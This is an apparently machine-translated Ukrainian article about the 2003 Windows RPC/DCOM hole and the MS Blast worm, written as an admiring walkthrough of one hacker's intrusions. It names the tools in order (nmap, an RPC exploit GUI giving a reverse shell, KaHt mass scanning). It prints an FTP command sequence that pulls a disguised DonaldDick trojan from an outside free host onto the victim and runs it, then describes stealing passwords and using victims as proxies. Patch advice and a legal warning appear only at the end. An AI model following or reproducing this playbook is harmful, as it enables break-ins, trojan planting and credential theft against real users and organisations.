Уразливість була страхітливою, правда
готовий експлоїт виявився недоступний для
основної маси людей ... Напевно тому
ніхто не відчував страху ...
Але через кілька годин Todd Sabin повідомляє,
що уразливими є всі сервіси RPC. це
значить установках програми захисту мережевого на
блокування 135 порту є не достатньою
засобом захисту. небезпеки піддаються
комп'ютери з відкритими 135 (UDP / TCP), 139, 445 і 593
портами. ЗМІ висвітлюють цю помилку, як
потенційну загрозу для безпеки
користувачів Windows. Справа йшла до глобальної
катастрофи. Але оскільки публічного
експлоїта випущено не було, все продовжували
жити своїм колишнім життям не замислюючись про
наслідки його появи в масах.
Але не все так пасивно відреагували на
поява даної уразливості. хакери
потроху починали писати приватні
експлоїти, а script kids продовжували чекати його
появи. Результат не змусив себе довго
чекати. На протязі декількох днів з'являються
деякі напрацювання в цій галузі,
з'являються перші експлоїти. Проте
більшість з них просто провокує збій
на віддаленій системі. Що можна пояснити,
оскільки технічних деталей з приводу
знайденої уразливості відомо не було. хоча
деякі версії ОС вже успішно
експлуатувалися.
Саме в цей момент почалася масивна
атака хакерів на рядових користувачів.
Більш того, з'явився інтернет черв'як MS Blast,
який з легкістю проникав на комп'ютери
підключені до Інтернету і навіть в
корпоративні мережі найбільших компаній
світу. У небезпеці опинилися всі ...
Напасти на віддалену машину не становить
особливих зусиль. Тому script kids взялися за
своя справа. Крадіжка кредитних кард і приватних
експлойтів зросла в кілька разів. І
багато ласі сегменти мережі стали
спробувати себе у смак. Саме цим зайнявся
один хакер. Він давно хотів захопити сервер,
але пристойною уразливості під нього до цього
не було. А не скористатися таким
подарунком долі він просто не міг.
П'єса в три акти
Перше, що довелося йому зробити перед
атакою, це перевірити яка саме
операційна система встановлена на
сервері. Для цього він скористався
утилітою nmap. Хакер не раз уже писав про її
можливостях, але я повторюся і скажу, що
вона використовується для визначення версії ОС
на віддаленому комп'ютері. благо вона
існує як для Windows, так і для * nix. А
оскільки хакер для своєї роботи
використовував Windows, то його вибір припав на
графічний варіант nmap.
Кілька хвилин роботи сканера і
результат позитивний. 135 порт виявився
відкритим і незахищеним брандмауером. це
було початком кінця, початком довгоочікуваної
атаки. На цей момент вже було написано
багато експлойтів, в тому числі і "RCP Exploit GUI # 2".
Його відмінною рисою було те, що він
мав графічний інтерфейс і містив в
собі вбудовані функції сканування
діапазону IP, а також FTP сервер.
Система здалася без будь-яких
пригод, так у хакера з'явився reverse-shell
з віддаленим сервером. Тепер, коли він міг
виконувати на ньому все що завгодно, прийшло
час встановити Троян. серед великого
числа можливих, був обраний DonaldDick. для
здійснення свого плану йому довелося
отримати хостинг на безкоштовному сервері з
підтримкою FTP. Цілком підійшов BY.RU, саме
туди він і закачав сервер для трояна. тепер,
коли DonaldDick став доступним по FTP, він назад
взявся за жертву, а точніше почав закачувати
на неї сервер трояна. Це був добре
продуманий план, оскільки вразливість
могли пропатчити, а троян він і в Африці
троян. Набравши в консолі ftp він взявся
закачувати файл. Весь процес зайняв у нього,
написання всього лише п'яти рядків:
open by.ru
імя_сервера.by.ru
пароль
get fooware.exe
bye
Де fooware.exe це перейменований сервер для
DonaldDick. Коли файл захитався, йому залишилося
тільки запустити його. Для цього він просто
написав ім'я файлу (fooware.exe) і з насолодою
натиснув Enter ... Після чого хакер отримав зручний
контроль над сервером.
Але знаєте як воно завжди буває, коли
знаходиш щось цікаве продовжуєш з
цим грати. Так і наш Хакер захотів
отримати більш ніж одну систему. подивившись,
що експлоїт KaHt
2 дозволяє провести масивне
сканування, він взявся за роботу, а точніше
за роботу взявся KaHt. його використання
виявилося не важким. Так наприклад, щоб
про переглядати мережу з IP 192.168.0. * (клас С), йому
потрібно було набрати "KaHt.exe 129.168.0.1
192.168.0.254 ". Що власне він і зробив,
після чого періодично перевіряв
результати. Таким чином він отримав доступ
до ще більшої кількості користувачів, від
яких потім зумів отримати паролі на
різні сервіси, пошти, і багато іншого
корисної інформації. Не кажучи вже про те,
що він став користуватися багатьма з них як
анонімними проксі.
Їжа для роздумів
Хоча Microsoft давно випустила латочку,
користувачі і адміністратори не поспішають
встановлювати патчі, сподіваючись що їх мережа не
буде нікому цікавою. Але таких хакерів
велика кількість і установка патча це
скоріше необхідність, ніж можливість.
Ще можна блокувати всі вхідні пакети
на 135, 139, 445 і 593 порти.
Природно, що все це хакер робив через
анонімну проксі, а в результаті почистив
за собою сліди присутності в системі. але вам
слід задуматися, перш ніж повторювати
його подвиги. Адже такі дії вважаються
протизаконними і можуть закінчитися для
вас досить плачевно ...
Покажи цю статтю друзям: